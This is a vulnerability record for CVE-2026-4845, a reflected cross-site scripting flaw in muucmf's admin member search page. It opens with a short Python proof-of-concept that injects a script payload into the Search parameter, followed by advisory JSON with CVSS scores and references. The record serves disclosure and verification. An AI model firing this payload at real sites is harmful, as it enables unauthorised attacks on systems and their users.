CVE-2026-4845

#!/usr/bin/env python3 # PoC for CVE-2026-4845: Reflected XSS in dameng100 muucmf # Usage: python3 poc.py <target_url> import requests import sys def verify_vulnerability(target): # Vulnerable parameter param = "Search" # Simple XSS payload to test reflection payload = '"><script>alert("CVE-2026-4845")</script>' target_url = f"{target}/admin/Member/index.html" try: print(f"[*] Sending request to {target_url}...") # Sending GET request with the malicious payload response = requests.get(target_url, params={param: payload}, timeout=10) # Checking if the payload is reflected unfiltered in the response if payload in response.text: print(f"[+] Vulnerability confirmed! Payload reflected in response.") print(f"[+] Exploit URL: {response.url}") else: print("[-] Payload not reflected. Target might be patched or not vulnerable.") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 poc.py http://example.com") sys.exit(1) verify_vulnerability(sys.argv[1])

{"cve": {"id": "CVE-2026-4845", "sourceIdentifier": "[email protected]", "published": "2026-03-26T06:16:09.533", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in dameng100 muucmf 1.9.5.20260309. Impacted is an unknown function of the file /admin/Member/index.html. This manipulation of the argument Search causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado un fallo en dameng100 muucmf 1.9.5.20260309. Afecta a una función desconocida del archivo /admin/Member/index.html. Esta manipulación del argumento Search causa cross-site scripting. Es posible iniciar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado. El proveedor fue contactado con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://thinhneee.github.io/posts/muucmf-xss/", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.353150", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.353150", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.776174", "source": "[email protected]"}]}}